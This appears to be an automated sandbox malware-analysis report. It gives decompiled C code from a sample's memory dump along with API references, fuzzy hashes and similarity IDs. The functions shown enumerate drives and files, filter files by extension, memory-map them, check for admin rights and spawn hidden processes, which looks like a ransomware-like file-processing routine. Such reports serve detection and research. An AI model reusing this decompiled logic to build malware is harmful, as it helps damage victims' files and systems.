				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0F586DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0f586f59
0x0f586f5f
0x0f586f6e
0x0f586f7c
0x0f586f90
0x0f586f98
0x0f586fa0
0x0f586fa8
0x0f586fb6
0x0f586fcb
0x0f586fdb
0x0f586fe3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F586F59
wsprintfW.USER32 ref: 0F586F6E
InitializeCriticalSection.KERNEL32(?), ref: 0F586F7C
VirtualAlloc.KERNEL32 ref: 0F586FB0

Part of subcall function 0F586DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
Part of subcall function 0F586DF0: lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586E3B
Part of subcall function 0F586DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F586FDB
ExitThread.KERNEL32 ref: 0F586FE3

Strings

%c:\, xrefs: 0F586F68

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: c66e06b352bd309b3e23ee20c4ffc7d70e2ff497fafbcf459fad273bf2fa8560
Instruction ID: 291b2525e64ddbce8bf315f89cba2bc34e9f46a70543ada91606c02c37840372
Opcode Fuzzy Hash: c66e06b352bd309b3e23ee20c4ffc7d70e2ff497fafbcf459fad273bf2fa8560
Instruction Fuzzy Hash: BB01D6B0144300BBE7109F20CD8AF173FA8AB44B21F004615FB65AA2C1D7B8951ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 0F582890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0F582890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0F583030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0F583030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0F583030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0F588400(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0F582830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,772D82B0,00000000,?,?,0F582C02), ref: 0F5828AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0F582C02), ref: 0F5828BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F582C02), ref: 0F5828E5
CloseHandle.KERNEL32(00000000,?,?,0F582C02), ref: 0F5828F3
MapViewOfFile.KERNEL32(00000000,772D82B1,00000000,00000000,00000000,?,?,0F582C02), ref: 0F58290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F582C02), ref: 0F582942
CloseHandle.KERNEL32(?,?,?,0F582C02), ref: 0F582951
CloseHandle.KERNEL32(00000000,?,?,0F582C02), ref: 0F582954

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 3ec919bdeac7e958364e995515fdd8c50c0068969fdf56239e857dcf4ed49e6e
Instruction ID: ec4abebaa35db9d10f304be953c7a5cccd1725b7aec16680b4e70216dac03bd5
Opcode Fuzzy Hash: 3ec919bdeac7e958364e995515fdd8c50c0068969fdf56239e857dcf4ed49e6e
Instruction Fuzzy Hash: 742104B1A002197FE7107BB49C85F7E7F6CEB85666F100236FD05B2281E7389C1759A1

Uniqueness

Uniqueness Score: -1.00%

Function 0F5869B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F5869B0(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xf592a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xf592a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

APIs

lstrlenW.KERNEL32 ref: 0F5869D2

Strings

%s , xrefs: 0F586A19

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: e3cd12a8c666c89f7728e7ddcafcbb07099c23f151a0f1c14b383fed7ed13a07
Instruction ID: 9442ac9452c9bb0c8e542145a2bc15fea8f6e6d51cd991a26dfaee94589e9f39
Opcode Fuzzy Hash: e3cd12a8c666c89f7728e7ddcafcbb07099c23f151a0f1c14b383fed7ed13a07
Instruction Fuzzy Hash: 9621F632A01225D7D7306B5C9D413B673A8FB85721F458276EC46BB281E7B5AD53C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 0F584E10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F584E10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0F589170( &_v92, 0, 0x44);
				_t15 =  *0xf592a6c; // 0x0
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xf592a68; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0f584e1c
0x0f584e22
0x0f584e24
0x0f584e29
0x0f584e2e
0x0f584e36
0x0f584e39
0x0f584e3c
0x0f584e41
0x0f584e48
0x0f584e4d
0x0f584e58
0x0f584e77
0x0f584e8d
0x0f584e98
0x0f584e79
0x0f584e83
0x0f584e83

APIs

_memset.LIBCMT ref: 0F584E29
CreateProcessW.KERNEL32 ref: 0F584E6F
GetLastError.KERNEL32(?,?,00000000), ref: 0F584E79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F584E8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F584E92

Strings

D, xrefs: 0F584E58

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 13fe62cef7129230e104a4d2383b6717d6b97bc5fd4bb4c64e1d5febe762b33b
Instruction ID: 6ca3ca8a7fcf8c385af7b3d77c7f72793dacd1f07f62118ef84623aeab92ddc8
Opcode Fuzzy Hash: 13fe62cef7129230e104a4d2383b6717d6b97bc5fd4bb4c64e1d5febe762b33b
Instruction Fuzzy Hash: 08018471E40319ABDB20DFA4DC46BDE7FB8EF04725F104126FA08FA280E7B525548B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F583C70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0F583C70() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0f583c79
0x0f583c99
0x0f583ca0
0x0f583ca8
0x0f583cbf
0x0f583cce
0x0f583cd5
0x0f583cd7
0x0f583cda
0x0f583ce6
0x0f583cad
0x0f583cad
0x0f583cad

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F583CA0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F583CB3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F583CBF
FreeSid.ADVAPI32(?), ref: 0F583CDA

Strings

advapi32.dll, xrefs: 0F583CAE
CheckTokenMembership, xrefs: 0F583CB9

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: aacb409969a19091ed48a33c872af9294abd4ed8dd41f605e78c4c680bcc02ae
Instruction ID: 2b1507b6ebf2d3368effc32d115b70a33524dd9144a2034125ae55ac8099ac37
Opcode Fuzzy Hash: aacb409969a19091ed48a33c872af9294abd4ed8dd41f605e78c4c680bcc02ae
Instruction Fuzzy Hash: 5AF03C30A50209BBDB009BF4DD0AFAD7BB8FB04716F100595F900B6281E778662A9B51

Uniqueness

Uniqueness Score: -1.00%

Function 0F586E69 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0F586E69() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + L0F586AB0( *_t38, _t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0F586DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

APIs

lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586E7C
lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586E96
lstrcatW.KERNEL32(00000000,?), ref: 0F586EA8
lstrcatW.KERNEL32(00000000,0F58FF7C), ref: 0F586EB9

Part of subcall function 0F586DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
Part of subcall function 0F586DF0: lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586E3B
Part of subcall function 0F586DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F586F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F586F2E

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 9a09fae8f862e7f6bf8d543c63de2df20a0068f007ce7d4fb94b4b6f7f7cbf47
Instruction ID: 1920c00e65b94681a648855e302fb06c2d088e33f59247a88c7751042cb7cf3a
Opcode Fuzzy Hash: 9a09fae8f862e7f6bf8d543c63de2df20a0068f007ce7d4fb94b4b6f7f7cbf47
Instruction Fuzzy Hash: 7E016D31A0024DAACB21BA60DC48BEE7BB8FF48240F0040A6F905F2111DB359A56DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0F583200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F583200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

APIs

lstrlenA.KERNEL32(0F585444,00000000,?,0F585445,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583251
GetProcessHeap.KERNEL32(00000008,00000001,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F58325B
HeapAlloc.KERNEL32(00000000,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583262
lstrlenA.KERNEL32(0F585444,00000000,?,0F585445,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583273
GetProcessHeap.KERNEL32(00000008,00000001,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F58327D
HeapAlloc.KERNEL32(00000000,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583284
lstrcpyA.KERNEL32(00000000,0F585444,?,0F5834BF,0F585445,00000001,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F583293

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: 09f10d3b3c259155b6958d15611f55180743da09de1cb546d5ae490d8b099b59
Instruction ID: 811f56816fac90b3f697cb9b47ea68c04c6809e84355938d8d5aa19c9def892c
Opcode Fuzzy Hash: 09f10d3b3c259155b6958d15611f55180743da09de1cb546d5ae490d8b099b59
Instruction Fuzzy Hash: 5711E9304041547ED7102F68D548BE67F58FF02B21F944526E8C6FB302C779A4578761

Uniqueness

Uniqueness Score: -1.00%

Function 0F5833E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F5833E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0F5832B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0F583320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0F583190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0F583200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x97850fe0
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

APIs

Part of subcall function 0F5832B0: lstrlenA.KERNEL32(?,00000000,?,0F585444,?,?,0F5833F6,00000000,00000000,?,?,0F585444,00000000), ref: 0F5832C5
Part of subcall function 0F5832B0: lstrlenA.KERNEL32(?,?,0F5833F6,00000000,00000000,?,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5832EE

lstrlenA.KERNEL32(0F585445,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F583484
GetProcessHeap.KERNEL32(00000008,00000001,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F58348E
HeapAlloc.KERNEL32(00000000,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F583495
lstrcpyA.KERNEL32(00000000,0F585445,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5834A7
ExitProcess.KERNEL32 ref: 0F5834DB

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 2cb9ae02c7b91c7aba9ed2e52654505e02047253668d4aa199c3f186de03da39
Instruction ID: 5393b5967fb15e5b77a6371f14ce5878435e1c365e4656408ba4f444b5118171
Opcode Fuzzy Hash: 2cb9ae02c7b91c7aba9ed2e52654505e02047253668d4aa199c3f186de03da39
Instruction Fuzzy Hash: B3310570504A456AEB223F68C44C7F57F54BB42B10F9841BAE8C5FB2A3D76E68478760

Uniqueness

Uniqueness Score: -1.00%

Function 0F583CF0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0F583D42
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F583D66
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F583D6A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F583D6E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F583D95

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: 5098bf79b92310458a44c74fadc14e4466f8ffa0986609baf8a66ddad1a9261f
Instruction ID: 6c2f69a5d26e00a9762ce04fae090be22d89df6d8b210bb27d6dc0145c04b085
Opcode Fuzzy Hash: 5098bf79b92310458a44c74fadc14e4466f8ffa0986609baf8a66ddad1a9261f
Instruction Fuzzy Hash: 2F1112B0D4031C7EEB619F64DC0ABEA7BBCEB08700F004195A508F61C1D6B95B548FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0F584EA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F584EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xf58faac]");
				_t16 =  *0xf58fab4; // 0x0
